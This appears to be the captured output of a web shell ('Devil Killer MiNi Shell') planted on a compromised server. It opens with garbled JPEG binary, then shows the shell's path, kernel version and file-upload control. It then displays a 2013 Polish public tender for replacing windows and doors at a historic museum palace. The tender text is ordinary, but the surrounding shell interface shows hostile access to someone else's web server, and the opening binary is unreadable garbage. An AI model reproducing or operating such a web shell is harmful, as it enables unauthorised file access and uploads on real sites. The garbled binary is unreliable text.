JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130415/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130415/146538-N-2013.html

<p class="kh_header"><b>Białystok: Roboty budowlane - dostawa i wymiana stolarki okiennej drewnianej i drzwiowej w budynku Muzeum Wnętrz Pałacowych w Choroszczy Oddziale Muzeum Podlaskiego w Białymstoku</b><br>
<b>Numer ogłoszenia: 146538 - 2013; data zamieszczenia: 15.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podlaskie w Białymstoku , ul. Ratusz-Rynek Kościuszki 10, 15-426 Białystok, woj. podlaskie, tel. 085 7421473, 7421440.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja kultury wojewodztwa podlaskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane - dostawa i wymiana stolarki okiennej drewnianej i drzwiowej w budynku Muzeum Wnętrz Pałacowych w Choroszczy Oddziale Muzeum Podlaskiego w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia.
Wymiana stolarki okiennej i drzwiowej  -  przewiduje się  wymianę stolarki na nową drewnianą z drewna twardego np. dąb lub modrzew syberyjski z zachowaniem konstrukcji, wymiarów, podziałów i rodzaju okuć - kolorystyka od zewnątrz szare
farba Rai nr 7040 od wewnątrz białe farba Ral nr 9016 rodzaj i numer farby wynika z zaleceń konserwatorskich, stolarka bezpieczna PA4,  - okna, drzwi balkonowe , naświetla drewniane skrzynkowe będące odwzorowaniem  istniejących okien, drzwi balkonowych i naświetli w kolorze szarym tak jak w Pałacu Branickich. Szyby zespolone niskoemisyjne, wypełnione argonem o współczynniku przenikania  ciepła U=1,1,szyby antywłamaniowe PA4, okucia antywłamaniowe Roto -           NTWKI, klamki z zamknięciem na klucz, klamki mosiężne typu motyIek.  - drzwi wejściowe drewniane, antywłamaniowe, będące odwzorowaniem drzwi z epoki. W drzwiach stosuje się okucia i zamki antywłamaniowe, stolarka i okucia winny posiadać atesty organów certyfikujących np. MSWiA. - roboty rozbiórkowe - demontaż istniejącej stolarki okiennej, drzwiowej, parapetów         wewnętrznych drewnianych, demontaż istniejących krat, - zamontowanie nowej stolarki okiennej i drzwiowej  po zdjęciu wymiarów okien i   drzwi z natury, - zamontowanie nowych parapetów wewnętrznych z drewna klejonego liściastego  twardego z   dębu, - zamontowanie nowych parapetów zewnętrznych z blachy miedzianej, - uzupełnienie tynków na ościeżach, - obrobić parapety i uzupełnić obróbki podokienne zewnętrzne, - pomalować ościeża od zewnątrz farbą fasadową w kolorze elewacji, - odtworzenie tynków glefów po wymianie stolarki i od wewnątrz malowanie glefów   farbą mineralną w kolorze pomieszczeń, - zamurowanie cegłą ceramiczna pełną bruzd pionowych i poziomych o przekroju  ?    x ? z cegły w ścianach z cegieł po demontażu starych ościeżnic. 
ROBOTY ROZBIÓRKOWE
1. Demontaż istniejącej stolarki okiennej, drzwiowej, 2. Demontaż drzwi wejściowych wraz z naświetlem. 3. Demontaż parapetów wewnętrznych drewnianych i zewnętrznych z blachy miedzianej. 4. Demontaż istniejących krat stalowych w oknach. 
STOLARKA
Okna i drzwi tarasowe Stolarka okienna wg zestawienia stolarki okiennej w części rysunkowej opracowania. Przed  wykonaniem stolarki producent zobowiązany  jest do sprawdzenia wymiarów  montażowych na budowie, 
 Okna  nietypowe , półskrzynkowe, obwiedniowe z drewna  dębowego lub modrzewia syberyjskiego o współczynniku przenikania ciepła dla całego wyrobu U 1,6 W m2K malowane lakierem bezbarwnym Pakiet szklany Pilkington Optifloat  Pilkington Optitherm SN 2-szybowe  ze szkła niskoemisyjnego Termo Float z pustką wypełnioną argonem o współczynniku przenikania ciepła Us 1,1 W m2K. W oknach W pomieszczeniach wentylowanych grawitacyjnie wprowadza się mikrowentylację w postaci rozszczelnienia uszczelki między ościeżnicą a ramą okienną w górnej ramie okiennej, współczynnik infiltracji powietrza a=0,5-1,0m3 m h daPa2 3-wg PN - 91 B 02020.  Stolarka z zachowaniem konstrukcji, wymiarów, podziałów i rodzaju okuć -  kolorystyka od zewnątrz szare farba Ral nr 7040 od wewnątrz  białe
 farba Ral nr 901 rodzaj  i numer farby wynika z zaleceń konserwatorskich, okucia mosiężne. W stolarce okiennej stosuje się ramy okienne z okuciami antywyważeniowymi jako wzmocnione. Okna w szybie zewnętrznej szklone szkłem antywłamaniowym ochronnym PA-04. Zewnętrzne skrzydła rozwierane otwierane na zewnątrz, wyposażone w klamki mosiężne typu motylek zamykane na klucz. Zewnętrzne skrzydła drzwi tarasowych rozwierane, otwierane do wewnątrz, wyposażone w klamki mosiężne typu motylek zamykane na klucz. Nie spełnia się § 299. ust. 1. Warunków technicznych jakim powinny odpowiadać   budynki i ich usytuowanie Dz.U. nr 75 poz. 690 z 2002r z późniejszymi zmianami który mówi, że okna w budynku powyżej drugiej kondygnacji nadziemnej, powinny mieć skrzydła otwierane do wewnątrz, ale zgodnie z ust. 3 przepisów określonych w ust. 1 nie stosuje się do budynku wpisanego do rejestru zabytków. 
 Okno połaciowe - WYKONANE  
Drzwi Stolarka drzwiowa wg zestawienia stolarki drzwiowej w części rysunkowej opracowania. Przed wykonaniem stolarki producent zobowiązany jest do sprawdzenia wymiarów otworów montażowvch na budowie. 
Drzwi wejściowe - projektowane indywidualne drzwi drewniane, filongowe z fajkami, zewnętrzne. Stosuje się ościeżnice drewniane pełne tak jak istniejące z dostosowaniem do grubości muru, filongi drewniane ocieplane pianką poliuretanową. Maksymalna wysokość progu przy posadzce - 2 cm. Wyposażone w samozamykacz, antywłamaniowy zamek na klucz, ozdobne klamki z mosiądzu. 
 Parapety wewnętrzne  Istniejące parapety wewnętrzne stalowe do wymiany na nowe drewniane dębowe z obłogiem dębowym grubości 4 mm z krawędziami frezowanymi według rysunku detalu, malowane jak stolarka od wewnątrz. 
Parapety zewnętrzne 
Istniejące parapety zewnętrzne miedziane do wymiany na nowe z blachy miedzianej o grubości 0,8 mm na piance poliuretanowej i na systemie powłoki izolacji przeciwwilgociowej np. typu Schomburg Aquafin 2 K na murze podokiennym i w progu drzwi balkonowych. 
NAPRAWA WĘGLARKÓW i GLEFÓW
Sprawdzić stan techniczny i zawilgocenie istniejącej konstrukcji ościeży z cegły. Następnie zagruntować powierzchnię ościeży. Uzupełnienie tynków na ościeżach z zaprawy cementowej naprawczej. Wykonać nowy tynk cementowo-wapienny kategorii IV na zewnątrz z dodatkiem mrozoodpornym. Odtworzyć i uzupełnić istniejące profilowania przy ościeżach. Powierzchnie malować dwukrotnie farbą mineralną w tym na elewacji farbą do zewnętrznego stosowania w kolorze istniejącej elewacji. Odtworzenie tynków glefów po wymianie stolarki i od wewnątrz malowanie glefów farbą mineralną w kolorze pomieszczeń. 
ZAMUROWANIA . Zamurowanie cegłą ceramiczna pełną klasy 15 MPa bruzd pionowych i poziomych o przekroju ?  x ?  cegły w ścianach z cegieł po demontażu starych ościeżnic. Zamurowania cegła na zaprawie cementowo- wapiennej marki M-7 MPa. 
IZOLACJE 
Izolacja termiczna Wskazuje się  potrzebę docieplenia obiektu przy dalszych etapach robót remontowych. Obecny zakres ocieplenia wynika z ograniczonego programu remontu zgodnie z umową na dokumentację projektową.  b.Izolacja przeciwwilgociowa
 Izolacja pozioma -Powłoki izolacji typ Schomburg Aquafin 2K na murach podokiennych i w progach drzwi wejściowych i drzwi balkonowych z wywinięciem na ściany i posadzki
UWAGI KOŃCOWE:
Wszystkie zastosowane materiały powinny być wprowadzone do obrotu wyrobów budowlanych poprzez :
-oznakowanie CE, co oznacza, że dokonano oceny  zgodności wyrobu z normą zharmonizowaną albo europejską aprobatą techniczną bądź krajową specyfikacją techniczną państwa członkowskiego Unii Europejskiej, 
albo  wyrób został umieszczony w określonym przez Komisję Europejską wykazie wyrobów mających niewielkie znaczenie dla zdrowia i bezpieczeństwa, dla których producent wydał deklarację zgodności z uznanymi regułami sztuki budowlanej, albo - - oznakowany jest znakiem budowlanym,
-Wszelkie roboty winny być wykonane pod nadzorem osób uprawnionych zgodnie z Warunkami technicznymi wykonania i odbioru robót budowlanych, zgodnie z zasadami BHP oraz według Specyfikacji technicznej wykonania i odbioru robót budowlanych.
- W przypadku podanych dokładnych materiałów i producentów dopuszcza się zastosowanie innych produktów o właściwościach nie gorszych niż Zaproponowane i dopuszczone do obrotu i powszechnego stosowania w budownictwie.
- Elementy drewniane zaimpregnować środkiem konserwującym i ogniochronnym.
- Elementy stalowe zabezpieczyć środkiem antykorozyjnym.
- Przed przystąpieniem do realizacji należy wymiary sprawdzić dokładnie w naturze.
- inne opisy robót budowlanych zgodnie z rysunkami- zamieszczonymi w projekcie- rysunki od nr 17 do 25 wraz z zestawieniem stolarki ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4, 45.45.30.00-7, 45.42.11.00-5, 45.42.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości  5.000,00 zł 
 ( słownie:   pięć tysięcy złotych).
2. Wadium może być wniesione w następujących formach:
a)pieniądzu;
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowe, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)gwarancjach bankowych;
d)gwarancjach ubezpieczeniowych;
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3. Miejsce i sposób wniesienia wadium, w przypadku wadium wnoszone w pieniądzu wadium należy wpłacić na konto w  PeKaO  S.A O/Białystok   nr 04 1240 5211 1111 0000 4919 5527
4. Zamawiający zatrzymuje  i  zwraca wadium Wykonawcom zgodnie  z art.46 ustawy .</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony,  jeżeli Wykonawca  wykonał ( rozpoczął i zakończył) lub wykonuje ( rozpoczął i aktualnie realizuje) w okresie ostatnich 5 lat przed dniem składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 3 robót budowlanych na obiektach zabytkowych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia( wymiana stolarki drzwiowej i okiennej) nie mniejszej niż 100.000,00 zł brutto każda  z podaniem ich wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej . 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia  nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony jeżeli Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają  obowiązek  posiadania takich uprawnień (robotami budowlanymi przy zabytkach nieruchomych mogą kierować osoby, które posiadają odpowiednie uprawnienia budowlane określone przepisami Prawa budowlanego oraz odbyły co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych - Rozporządzenie Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. Nr 150, poz.1579),
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony jeżeli Wykonawca posiada aktualna polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę nie mniejszą niż 200.000,00zł  lub oświadczenie, że z dniem podpisania umowy Wykonawca posiadać będzie ubezpieczenie na kwotę nie mniejszą niż 200.000,00 zł.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia  nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony zgodnie z treścią i podpisany formularz Oferta, stanowiący Załącznik  Nr   1 do SIWZ
Podpisane oświadczenie o akceptacji warunków postępowania, w tym warunków  umowy, stanowiące Załącznik 10  do SIWZ
Pełnomocnictwo do podpisania oferty i innych dokumentów, jeżeli upoważnienie do ich złożenia nie wynika z przepisów bądź zapisów właściwego rejestru. Pełnomocnictwo powinno zostać złożone w formie   oryginału.
Oświadczenie o realizacji zamówienia samodzielnie lub przy pomocy podwykonawców stanowiące Załącznik Nr 9  do SIWZ.
Oświadczenie o wizji lokalnej stanowiący  Załącznik Nr 11  do SIWZ.
Szczegółowy kosztorys ofertowy , powinien zawierać: 
Szczegółowy kosztorys ofertowy prac z wyszczególnionymi kosztami realizacji netto i brutto zadania, przygotowanego przez Wykonawcę robót.
Ofertowy kosztorys budowlany musi być szczegółowy i zawierać następujące elementy: stronę tytułową, przedmiar robót, kalkulację szczegółową zastosowanych cen jednostkowych, tabelę elementów scalonych oraz w załączniku - dla analiz indywidualnych i analogii - kalkulację szczegółową cen jednostkowych wraz z uzasadnieniem 
Oświadczenie o przynależności do grupy kapitałowej - Załącznik Nr 12 do SIWZ
Dowód wpłaty wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

